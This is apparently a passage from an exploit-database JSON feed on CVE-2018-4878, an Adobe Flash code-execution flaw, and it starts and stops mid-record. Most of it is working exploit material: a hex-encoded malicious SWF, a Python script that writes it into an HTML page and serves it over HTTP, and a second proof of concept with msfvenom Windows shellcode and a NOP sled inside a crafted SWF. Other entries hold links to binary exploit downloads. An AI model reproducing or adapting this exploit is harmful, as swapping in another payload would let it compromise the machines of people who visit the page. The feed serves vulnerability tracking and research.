0\\x61\\x44\\x5D\\x57\\x66\\x57\\x24\\x0C\\x46\\x59\\x01\\x46\\x09\\x00\\x2C\\x72\\x14\\x35\\x00\\x00\\x65\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x01\\x65\\x01\\x6C\\x03\\xA0\\x24\\x03\\x24\\x04\\xA2\\xA1\\x46\\x4E\\x01\\x74\\x6D\\x05\\x65\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x01\\x65\\x01\\x6C\\x03\\xA0\\x24\\x04\\xA0\\x46\\x4E\\x01\\x74\\x6D\\x06\\xF0\\x42\\x10\\x1B\\x00\\x00\\x65\\x01\\x65\\x01\\x6C\\x03\\x24\\x05\\x24\\x04\\xA2\\xA0\\x74\\x6D\\x03\\x65\\x01\\x6C\\x03\\x65\\x01\\x6C\\x04\\x15\\x84\\xFF\\xFF\\x65\\x01\\x6C\\x05\\x24\\x00\\xAB\\x76\\x2A\\x76\\x11\\x09\\x00\\x00\\x29\\x65\\x01\\x6C\\x06\\x24\\x00\\xAB\\x76\\x11\\x04\\x00\\x00\\x10\\x0A\\x00\\x00\\xF0\\x48\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\xF0\\x4A\\x65\\x01\\x65\\x01\\x6C\\x05\\x65\\x01\\x6C\\x02\\xA0\\x74\\x6D\\x05\\xF0\\x4B\\x65\\x01\\x24\\x00\\x74\\x6D\\x03\\x10\\xE9\\x00\\x00\\x09\\xF0\\x4E\\x65\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x05\\x46\\x4E\\x01\\x74\\x6D\\x01\\x65\\x01\\x6C\\x01\\x24\\x00\\x14\\x0A\\x00\\x00\\xF0\\x51\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\x5D\\x57\\x66\\x57\\x65\\x01\\x6C\\x02\\x65\\x01\\x6C\\x01\\xA0\\x61\\x44\\x5D\\x57\\x66\\x57\\x46\\x54\\x00\\x46\\x09\\x00\\x2C\\x73\\x14\\x38\\x00\\x00\\xF0\\x56\\x65\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x02\\x65\\x01\\x6C\\x06\\xA0\\x65\\x01\\x6C\\x03\\x24\\x04\\xA2\\xA0\\x46\\x4E\\x01\\x74\\x6D\\x07\\xF0\\x57\\x65\\x01\\x6C\\x08\\xC0\\x73\\x65\\x01\\x2B\\x6D\\x08\\x65\\x01\\x6C\\x08\\x24\\x01\\x0E\\x58\\x00\\x00\\x10\\x7E\\x00\\x00\\x5D\\x57\\x66\\x57\\x65\\x01\\x6C\\x02\\x65\\x01\\x6C\\x01\\xA0\\x61\\x44\\x5D\\x57\\x66\\x57\\x46\\x54\\x00\\x46\\x09\\x00\\x2C\\x74\\x13\\x04\\x00\\x00\\x10\\x31\\x00\\x00\\x5E\\x5F\\x5D\\x4E\\x65\\x01\\x6C\\x02\\x65\\x01\\x6C\\x06\\xA0\\x65\\x01\\x6C\\x03\\x24\\x04\\xA2\\xA0\\x46\\x4E\\x01\\x61\\x5F\\xF0\\x63\\x65\\x01\\x6C\\x08\\xC0\\x73\\x65\\x01\\x2B\\x6D\\x08\\x65\\x01\\x6C\\x08\\x24\\x01\\x17\\x2A\\x00\\x00\\x65\\x01\\x6C\\x03\\x91\\x74\\x65\\x01\\x2B\\x6D\\x03\\xF0\\x6B\\x65\\x01\\x65\\x01\\x6C\\x05\\x24\\x04\\xA0\\x74\\x6D\\x05\\xF0\\x4C\\x65\\x01\\x6C\\x03\\x25\\x80\\x02\\x0C\\x04\\x00\\x00\\x10\\x06\\xFF\\xFF\\x65\\x01\\x6C\\x07\\x48\\xF0\\x6F\\x10\\x17\\x00\\x00\\xD0\\x30\\xD1\\x30\\x5A\\x00\\x2A\\xD6\\x2A\\x30\\x2B\\x6D\\x01\\xF0\\x71\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\x24\\x00\\x48\\x01\\x46\\x84\\x06\\x8A\\x06\\x3C\\x3D\\x08\\x0D\\x00\\x01\\x01\\x00\\x0E\\x00\\x02\\x01\\x00\\x0F\\x00\\x03\\x01\\x00\\x10\\x00\\x04\\x01\\x00\\x11\\x00\\x05\\x01\\x00\\x12\\x00\\x06\\x01\\x00\\x13\\x00\\x07\\x01\\x00\\x14\\x00\\x08\\x15\\x00\\x03\\x0D\\x0D\\x04\\x05\\x86\\x03\\xD0\\x30\\x24\\x00\\x74\\x63\\x04\\x5D\\x4D\\x46\\x4D\\x00\\x29\\x5D\\x4C\\x5D\\x4D\\x66\\x4D\\x46\\x4C\\x01\\x74\\x63\\x05\\xF0\\x7C\\x5D\\x4E\\x5D\\x4E\\x5D\\x4E\\x62\\x05\\x24\\x08\\xA0\\x46\\x4E\\x01\\x24\\x14\\xA0\\x46\\x4E\\x01\\x24\\x04\\xA0\\x46\\x4E\\x01\\x5D\\x51\\x66\\x51\\x96\\x96\\x12\\x08\\x00\\x00\\x25\\xBC\\x01\\x82\\x10\\x04\\x00\\x00\\x25\\xB0\\x01\\x82\\xA0\\x74\\x63\\x06\\xF0\\x7D\\x5D\\x4E\\x62\\x06\\x46\\x4E\\x01\\x2D\\x04\\x15\\x04\\x00\\x00\\x10\\x0A\\x00\\x00\\xF0\\x7F\\x62\\x06\\x24\\x04\\xA0\\x74\\x63\\x06\\xF0\\x81\\x01\\x5D\\x4E\\x62\\x06\\x46\\x4E\\x01\\x74\\x63\\x06\\xF0\\x82\\x01\\x5D\\x4E\\x62\\x06\\x46\\x4E\\x01\\x74\\x63\\x07\\xF0\\x83\\x01\\x5D\\x4E\\x62\\x05\\x24\\x1C\\xA0\\x46\\x4E\\x01\\x74\\x63\\x08\\xF0\\x84\\x01\\x5D\\x4E\\x62\\x05\\x24\\x20\\xA0\\x46\\x4E\\x01\\x74\\x63\\x09\\xF0\\x85\\x01\\x5D\\x47\\x66\\x47\\x5D\\x40\\x66\\x40\\x53\\x01\\x25\\x80\\x02\\x42\\x01\\x80\\x5A\\x63\\x0A\\x10\\x24\\x00\\x00\\x09\\xF0\\x88\\x01\\x62\\x0A\\x62\\x04\\x5D\\x4E\\x62\\x07\\x25\\x80\\x01\\xA1\\x62\\x04\\x24\\x04\\xA2\\xA0\\x46\\x4E\\x01\\x61\\x53\\xF0\\x89\\x01\\x62\\x04\\x91\\x74\\x63\\x04\\xF0\\x86\\x01\\x62\\x04\\x25\\x80\\x02\\x0C\\x04\\x00\\x00\\x10\\xCC\\xFF\\xFF\\xF0\\x8B\\x01\\x62\\x0A\\x24\\x20\\x24\\x07\\xA0\\xD1\\x61\\x53\\xF0\\x8C\\x01\\x5D\\x4F\\x62\\x05\\x24\\x1C\\xA0\\xD2\\x46\\x4F\\x02\\x29\\xF0\\x8D\\x01\\x5D\\x4F\\x62\\x05\\x24\\x20\\xA0\\xD3\\x46\\x4F\\x02\\x29\\xF0\\x8E\\x01\\x5D\\x4F\\x62\\x06\\x5D\\x49\\x62\\x0A\\x46\\x49\\x01\\x25\\x80\\x01\\xA0\\x46\\x4F\\x02\\x29\\xF0\\x8F\\x01\\x5D\\x3E\\x24\\x41\\x4A\\x3E\\x01\\x80\\x3E\\x63\\x0B\\xF0\\x90\\x01\\x5D\\x4D\\x66\\x4D\\x66\\x1F\\x20\\x62\\x0B\\x46\\x20\\x02\\x82\\x63\\x0C\\xF0\\x91\\x01\\x5D\\x4F\\x62\\x06\\x62\\x07\\x46\\x4F\\x02\\x29\\xF0\\x92\\x01\\x5D\\x4F\\x62\\x05\\x24\\x1C\\xA0\\x62\\x08\\x46\\x4F\\x02\\x29\\xF0\\x93\\x01\\x5D\\x4F\\x62\\x05\\x24\\x20\\xA0\\x62\\x09\\x46\\x4F\\x02\\x29\\xF0\\x94\\x01\\x47\\x00\\x00\\x04\\x0C\\x03\\x05\\x0A\\x92\\x03\\xD0\\x30\\x57\\x2A\\xD5\\x30\\x65\\x01\\x24\\x00\\x6D\\x02\\xF0\\x98\\x01\\x65\\x01\\x20\\x80\\x3E\\x6D\\x01\\xF0\\x99\\x01\\x65\\x01\\x20\\x80\\x65\\x6D\\x03\\xF0\\x9F\\x01\\x65\\x01\\x5D\\x3F\\x66\\x3F\\x82\\x6D\\x08\\xF0\\xA0\\x01\\x65\\x01\\x20\\x85\\x6D\\x09\\xF0\\xA4\\x01\\xF0\\xA4\\x01\\x65\\x01\\x56\\x00\\x80\\x3E\\x6D\\x01\\xF0\\xA5\\x01\\x5D\\x42\\x66\\x42\\x66\\x43\\x24\\x00\\x61\\x44\\xF0\\xA6\\x01\\x65\\x01\\x24\\x00\\x73\\x6D\\x02\\x10\\x24\\x00\\x00\\x09\\xF0\\xA7\\x01\\x65\\x01\\x6C\\x01\\x5D\\x42\\x66\\x42\\x66\\x43\\x46\\x45\\x00\\x46\\x25\\x01\\x29\\xF0\\xA6\\x01\\x65\\x01\\x65\\x01\\x6C\\x02\\x24\\x04\\xA0\\x73\\x6D\\x02\\x65\\x01\\x6C\\x02\\x5D\\x42\\x66\\x42\\x66\\x43\\x66\\x46\\x15\\xCC\\xFF\\xFF\\xF0\\xA8\\x01\\x65\\x01\\x5D\\x47\\x66\\x47\\x5D\\x40\\x66\\x40\\x53\\x01\\x64\\x65\\x01\\x6C\\x01\\x41\\x01\\x80\\x66\\x6D\\x03\\xF0\\xAA\\x01\\x65\\x01\\x5D\\x49\\x65\\x01\\x6C\\x03\\x46\\x49\\x01\\x74\\x6D\\x04\\xF0\\xAC\\x01\\x65\\x01\\x5D\\x64\\x46\\x64\\x00\\x74\\x6D\\x05\\xF0\\xAD\\x01\\x65\\x01\\x6C\\x05\\x24\\x00\\x13\\x04\\x00\\x00\\x10\\x0B\\x00\\x00\\xF0\\xAF\\x01\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\x5D\\x4B\\x65\\x01\\x6C\\x05\\x65\\x01\\x6C\\x04\\x65\\x01\\x6C\\x03\\x66\\x46\\x24\\x04\\xA2\\x46\\x4B\\x03\\x29\\x65\\x01\\x5D\\x4C\\x5D\\x4D\\x66\\x4D\\x46\\x4C\\x01\\x74\\x6D\\x06\\xF0\\xB4\\x01\\x65\\x01\\x5D\\x4E\\x5D\\x4E\\x65\\x01\\x6C\\x06\\x24\\x1C\\xA0\\x46\\x4E\\x01\\x24\\x08\\xA0\\x46\\x4E\\x01\\x24\\x04\\xA0\\x74\\x6D\\x06\\xF0\\xB5\\x01\\x65\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x06\\x46\\x4E\\x01\\x74\\x6D\\x07\\xF0\\xB6\\x01\\x5D\\x4F\\x65\\x01\\x6C\\x06\\x65\\x01\\x6C\\x04\\x46\\x4F\\x02\\x29\\xF0\\xB8\\x01\\x65\\x01\\x5D\\x4D\\x66\\x4D\\x20\\x5D\\x5F\\x66\\x5F\\x46\\x1F\\x02\\x82\\x6D\\x08\\xF0\\xBA\\x01\\x5D\\x4F\\x65\\x01\\x6C\\x06\\x65\\x01\\x6C\\x07\\x46\\x4F\\x02\\x29\\x47\\x10\\x18\\x00\\x00\\xD0\\x30\\xD1\\x30\\x5A\\x00\\x2A\\xD6\\x2A\\x30\\x2B\\x6D\\x01\\xF0\\xBF\\x01\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\xF0\\xC2\\x01\\x47\\x01\\x35\\xF2\\x02\\xF6\\x02\\x3C\\x3D\\x09\\x29\\x00\\x01\\x1E\\x00\\x2A\\x00\\x02\\x15\\x00\\x2B\\x00\\x03\\x1A\\x00\\x2C\\x00\\x04\\x01\\x00\\x2D\\x00\\x05\\x01\\x00\\x2E\\x00\\x06\\x01\\x00\\x2F\\x00\\x07\\x01\\x00\\x30\\x00\\x08\\x00\\x00\\x31\\x00\\x09\\x32\\x00\\x05\\x08\\x01\\x05\\x06\\x0E\\xF1\\x05\\xF0\\x0C\\xD0\\x30\\xF0\\x0E\\xD0\\x49\\x00\\xF0\\x0F\\x47\\x00\\x00\\x06\\x09\\x01\\x01\\x04\\x3D\\xD0\\x30\\x10\\x05\\x00\\x00\\x41\\x05\\x03\\x58\\x04\\xF1\\x05\\xF0\\x07\\x5D\\x36\\x5D\\x37\\x66\\x37\\x10\\x04\\x00\\x00\\x16\\x1F\\x00\\x00\\x30\\x5D\\x35\\x66\\x35\\x30\\x5D\\x35\\x66\\x35\\x58\\x00\\x1D\\x26\\x11\\x06\\x00\\x00\\x47\\x70\\x45\\x0A\\x10\\xD5\\x1D\\x68\\x34\\xF1\\x05\\xF0\\x05\\x47\\x00\\x00\\x1C\\x13\\x02\\x00\\x02\\x00\\x73\\x68\\x65\\x6C\\x6C\\x63\\x6F\\x64\\x42\\x79\\x74\\x65\\x73\\x00\\x00\\x00\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x00\\x40\\x00\\x00\\x00\"\n\n\nprint \"[+] CVE-2018-4878 poc \"\nprint \"[x] files created\"\n\nswf = \"%s.swf\" % flash_name\n \nhtml = \"\"\"\n<!DOCTYPE html>\n<html>\n\n\"\"\" + \"<embed src=\\\"\" + swf + \"\\\"></embed>\" + \"\"\"\n</html>\n\"\"\"\n \nf = open(\"%s\" % swf, \"wb\")\nf.write(data)\nf.close()\n \nf = open(\"index.html\", \"wb\")\nf.write(html)\nf.close()\n\n\nHandlerClass = SimpleHTTPRequestHandler\nServerClass = BaseHTTPServer.HTTPServer\nProtocol = \"HTTP/1.0\"\n\n\nport = 8080\nserver_address = ('0.0.0.0', port)\n\nHandlerClass.protocol_version = Protocol\nhttpd = ServerClass(server_address, HandlerClass)\n\nsa = httpd.socket.getsockname()\nprint \"Server ready\", sa[0], \"port\", sa[1], \"...\"\nhttpd.serve_forever()", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:15", "description": "\nFlash ActiveX 28.0.0.137 - Code Execution (1)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-02-16T00:00:00", "title": "Flash ActiveX 28.0.0.137 - Code Execution (1)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4878"], "modified": "2016-02-16T00:00:00", "id": "EXPLOITPACK:6891CF27FFF72B8EB68CEFB56D149FC3", "href": "", "sourceData": "## CVE-2018-4878 (flash exploit)\n\nPop up a calculator - tested with installation of flash activeX plugin 28.0.0.137\n\nDownload: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44744.xlsx", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-05-24T18:03:23", "description": "Exploit for windows platform in category local exploits", "cvss3": {}, "published": "2018-05-24T00:00:00", "type": "zdt", "title": "Flash ActiveX 28.0.0.137 - Code Execution Exploit (1)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-4878"], "modified": "2018-05-24T00:00:00", "id": "1337DAY-ID-30431", "href": "https://0day.today/exploit/description/30431", "sourceData": "## CVE-2018-4878 (flash exploit)\r\n \r\nPop up a calculator - tested with installation of flash activeX plugin 28.0.0.137\r\n \r\nDownload: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44744.xlsx\n\n# 0day.today [2018-05-24] #", "sourceHref": "https://0day.today/exploit/30431", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-14T01:48:12", "description": "Adobe Flash versions 28.0.0.137 and below remote code execution proof of concept exploit.", "cvss3": {}, "published": "2018-04-04T00:00:00", "type": "zdt", "title": "Adobe Flash 28.0.0.137 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-4878"], "modified": "2018-04-04T00:00:00", "id": "1337DAY-ID-30119", "href": "https://0day.today/exploit/description/30119", "sourceData": "#!/usr/bin/env python\r\n# coding: UTF-8\r\nimport BaseHTTPServer\r\nimport sys\r\nfrom SimpleHTTPServer import SimpleHTTPRequestHandler\r\n\r\nprint \"@Syfi2k\"\r\nprint \"[+] CVE-2018-4878 poc \"\r\nprint \"--------------------------------\"\r\nprint \"Calc.exe Shellcode via Msfvenom\"\r\nprint \"Based on fixed version https://github.com/anbai-inc/CVE-2018-4878\"\r\nprint \"No Crash without executing the Shellcode, Sandbox? try it yourself\"\r\n\r\n\r\nbuf = \"\"\r\nbuf += \"\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b\"\r\nbuf += \"\\x50\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\"\r\nbuf += \"\\x4a\\x26\\x31\\xff\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\"\r\nbuf += \"\\x0d\\x01\\xc7\\xe2\\xf2\\x52\\x57\\x8b\\x52\\x10\\x8b\\x4a\\x3c\"\r\nbuf += \"\\x8b\\x4c\\x11\\x78\\xe3\\x48\\x01\\xd1\\x51\\x8b\\x59\\x20\\x01\"\r\nbuf += \"\\xd3\\x8b\\x49\\x18\\xe3\\x3a\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\"\r\nbuf += \"\\xff\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf6\\x03\\x7d\"\r\nbuf += \"\\xf8\\x3b\\x7d\\x24\\x75\\xe4\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\"\r\nbuf += \"\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\"\r\nbuf += \"\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x5f\"\r\nbuf += \"\\x5f\\x5a\\x8b\\x12\\xeb\\x8d\\x5d\\x6a\\x01\\x8d\\x85\\xb2\\x00\"\r\nbuf += \"\\x00\\x00\\x50\\x68\\x31\\x8b\\x6f\\x87\\xff\\xd5\\xbb\\xf0\\xb5\"\r\nbuf += \"\\xa2\\x56\\x68\\xa6\\x95\\xbd\\x9d\\xff\\xd5\\x3c\\x06\\x7c\\x0a\"\r\nbuf += \"\\x80\\xfb\\xe0\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x53\"\r\nbuf += \"\\xff\\xd5\\x63\\x61\\x6c\\x63\\x2e\\x65\\x78\\x65\\x00\"\r\n \r\npayload = buf\r\ndata = \"\"\r\nflash_name = \"movie\"\r\n \r\n\r\n\r\ndata = \"\\x46\\x57\\x53\\x20\\xE3\\x45\\x00\\x00\\x78\\x00\\x04\\xE2\\x00\\x00\\x0E\\xA6\\x00\\x00\\x18\\x01\\x00\\x44\\x11\\x19\\x00\\x00\\x00\\x7F\\x13\\x1F\\x02\\x00\\x00\\x3C\\x72\\x64\\x66\\x3A\\x52\\x44\\x46\\x20\\x78\\x6D\\x6C\\x6E\\x73\\x3A\\x72\\x64\\x66\\x3D\\x22\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x77\\x77\\x77\\x2E\\x77\\x33\\x2E\\x6F\\x72\\x67\\x2F\\x31\\x39\\x39\\x39\\x2F\\x30\\x32\\x2F\\x32\\x32\\x2D\\x72\\x64\\x66\\x2D\\x73\\x79\\x6E\\x74\\x61\\x78\\x2D\\x6E\\x73\\x23\\x22\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x3C\\x72\\x64\\x66\\x3A\\x44\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6F\\x6E\\x20\\x78\\x6D\\x6C\\x6E\\x73\\x3A\\x64\\x63\\x3D\\x22\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x70\\x75\\x72\\x6C\\x2E\\x6F\\x72\\x67\\x2F\\x64\\x63\\x2F\\x65\\x6C\\x65\\x6D\\x65\\x6E\\x74\\x73\\x2F\\x31\\x2E\\x31\\x22\\x20\\x72\\x64\\x66\\x3A\\x61\\x62\\x6F\\x75\\x74\\x3D\\x22\\x22\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x66\\x6F\\x72\\x6D\\x61\\x74\\x3E\\x61\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x2F\\x78\\x2D\\x73\\x68\\x6F\\x63\\x6B\\x77\\x61\\x76\\x65\\x2D\\x66\\x6C\\x61\\x73\\x68\\x3C\\x2F\\x64\\x63\\x3A\\x66\\x6F\\x72\\x6D\\x61\\x74\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x74\\x69\\x74\\x6C\\x65\\x3E\\x41\\x64\\x6F\\x62\\x65\\x20\\x46\\x6C\\x65\\x78\\x20\\x34\\x20\\x41\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x3C\\x2F\\x64\\x63\\x3A\\x74\\x69\\x74\\x6C\\x65\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x64\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6F\\x6E\\x3E\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x77\\x77\\x77\\x2E\\x61\\x64\\x6F\\x62\\x65\\x2E\\x63\\x6F\\x6D\\x2F\\x70\\x72\\x6F\\x64\\x75\\x63\\x74\\x73\\x2F\\x66\\x6C\\x65\\x78\\x3C\\x2F\\x64\\x63\\x3A\\x64\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6F\\x6E\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x70\\x75\\x62\\x6C\\x69\\x73\\x68\\x65\\x72\\x3E\\x75\\x6E\\x6B\\x6E\\x6F\\x77\\x6E\\x3C\\x2F\\x64\\x63\\x3A\\x70\\x75\\x62\\x6C\\x69\\x73\\x68\\x65\\x72\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x63\\x72\\x65\\x61\\x74\\x6F\\x72\\x3E\\x75\\x6E\\x6B\\x6E\\x6F\\x77\\x6E\\x3C\\x2F\\x64\\x63\\x3A\\x63\\x72\\x65\\x61\\x74\\x6F\\x72\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x6C\\x61\\x6E\\x67\\x75\\x61\\x67\\x65\\x3E\\x45\\x4E\\x3C\\x2F\\x64\\x63\\x3A\\x6C\\x61\\x6E\\x67\\x75\\x61\\x67\\x65\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x64\\x61\\x74\\x65\\x3E\\x46\\x65\\x62\\x20\\x36\\x2C\\x20\\x32\\x30\\x31\\x38\\x3C\\x2F\\x64\\x63\\x3A\\x64\\x61\\x74\\x65\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x3C\\x2F\\x72\\x64\\x66\\x3A\\x44\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6F\\x6E\\x3E\\x20\\x3C\\x2F\\x72\\x64\\x66\\x3A\\x52\\x44\\x46\\x3E\\x0D\\x0A\\x00\\xD0\\x0F\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x44\\x10\\xE8\\x03\\x3C\\x00\\x43\\x02\\xFF\\xFF\\xFF\\xC8\\x0A\\x66\\x6C\\x61\\x73\\x68\\x30\\x32\\x00\\xFF\\x15\\x82\\x0B\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\"\r\n \r\n\r\nfiller = 2940 - len(payload)\r\n \r\ndata = data + payload + \"\\x90\" * filler\r\n\r\n\r\ndata = data + \"\\x13\\x0E\\x01\\x00\\x02\\x00\\x73\\x68\\x65\\x6C\\x6C\\x63\\x6F\\x64\\x42\\x79\\x74\\x65\\x73\\x00\\x00\\xBF\\x14\\xB6\\x06\\x00\\x00\\x01\\x00\\x00\\x00\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x00\\x10\\x00\\x2E\\x00\\x02\\x00\\x28\\x8E\\xCD\\xBD\\x06\\xAD\\xCA\\x75\\x8F\\xCD\\xBD\\x06\\xAE\\xE4\\xE0\\x03\\x8E\\xCD\\xBD\\x06\\xFC\\xE2\\x75\\x8E\\xCD\\xBD\\x06\\xFE\\xF0\\x75\\x8E\\xCD\\xBD\\x06\\xF8\\xF8\\x75\\x8F\\xCD\\xBD\\x06\\xF9\\xFE\\xA1\\x03\\x8E\\xCD\\xBD\\x06\\xF8\\xDE\\x75\\x89\\xCD\\xBD\\x06\\xDC\\xB6\\xCD\\x02\\xD6\\xF6\\x68\\x8F\\xCD\\xBD\\x06\\xFA\\xE6\\xCD\\x03\\x8F\\xCD\\xBD\\x06\\xF5\\xDC\\xA1\\x03\\x8E\\xCD\\xBD\\x06\\xF1\\xDC\\x74\\x8F\\xCD\\xBD\\x06\\xD1\\xBA\\xFD\\x02\\x8F\\xCD\\xBD\\x06\\xEC\\xDC\\xCD\\x03\\x8E\\xCD\\xBD\\x06\\xEF\\xE4\\x75\\x8E\\xCD\\xBD\\x06\\xEE\\xF8\\x75\\x8E\\xCD\\xBD\\x06\\xE9\\xF0\\x75\\x89\\xCD\\xBD\\x06\\xEE\\xE6\\xDD\\x03\\xFF\\xD0\\x69\\x8F\\xCD\\xBD\\x06\\xCB\\xAA\\xC9\\x02\\x93\\xCD\\xBD\\x06\\x00\\x55\\x07\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x05\\x76\\x61\\x72\\x5F\\x31\\x00\\x0E\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x05\\x76\\x61\\x72\\x5F\\x32\\x0E\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x06\\x64\\x61\\x74\\x61\\x31\\x34\\x06\\x64\\x61\\x74\\x61\\x31\\x35\\x3C\\x43\\x3A\\x5C\\x55\\x73\\x65\\x72\\x73\\x5C\\x4D\\x69\\x68\\x61\\x5C\\x41\\x64\\x6F\\x62\\x65\\x4D\\x69\\x6E\\x65\\x50\\x6F\\x43\\x5F\\x74\\x72\\x79\\x69\\x6E\\x67\\x54\\x6F\\x45\\x76\\x61\\x64\\x65\\x53\\x65\\x63\\x53\\x6F\\x6C\\x75\\x74\\x69\\x6F\\x6E\\x73\\x66\\x6C\\x61\\x30\\x31\\x2E\\x61\\x73\\x05\\x64\\x61\\x74\\x61\\x32\\x05\\x64\\x61\\x74\\x61\\x33\\x09\\x42\\x79\\x74\\x65\\x41\\x72\\x72\\x61\\x79\\x0B\\x66\\x6C\\x61\\x73\\x68\\x2E\\x75\\x74\\x69\\x6C\\x73\\x06\\x45\\x6E\\x64\\x69\\x61\\x6E\\x0D\\x4C\\x49\\x54\\x54\\x4C\\x45\\x5F\\x45\\x4E\\x44\\x49\\x41\\x4E\\x06\\x65\\x6E\\x64\\x69\\x61\\x6E\\x0C\\x43\\x61\\x70\\x61\\x62\\x69\\x6C\\x69\\x74\\x69\\x65\\x73\\x0C\\x66\\x6C\\x61\\x73\\x68\\x2E\\x73\\x79\\x73\\x74\\x65\\x6D\\x07\\x76\\x65\\x72\\x73\\x69\\x6F\\x6E\\x01\\x2C\\x01\\x20\\x07\\x72\\x65\\x70\\x6C\\x61\\x63\\x65\\x21\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x61\\x64\\x6F\\x62\\x65\\x2E\\x63\\x6F\\x6D\\x2F\\x41\\x53\\x33\\x2F\\x32\\x30\\x30\\x36\\x2F\\x62\\x75\\x69\\x6C\\x74\\x69\\x6E\\x05\\x73\\x70\\x6C\\x69\\x74\\x05\\x41\\x72\\x72\\x61\\x79\\x0C\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x2E\\x61\\x73\\x24\\x30\\x14\\x66\\x6C\\x61\\x73\\x68\\x2E\\x64\\x69\\x73\\x70\\x6C\\x61\\x79\\x3A\\x53\\x70\\x72\\x69\\x74\\x65\\x24\\x66\\x6C\\x61\\x73\\x68\\x2E\\x64\\x69\\x73\\x70\\x6C\\x61\\x79\\x3A\\x44\\x69\\x73\\x70\\x6C\\x61\\x79\\x4F\\x62\\x6A\\x65\\x63\\x74\\x43\\x6F\\x6E\\x74\\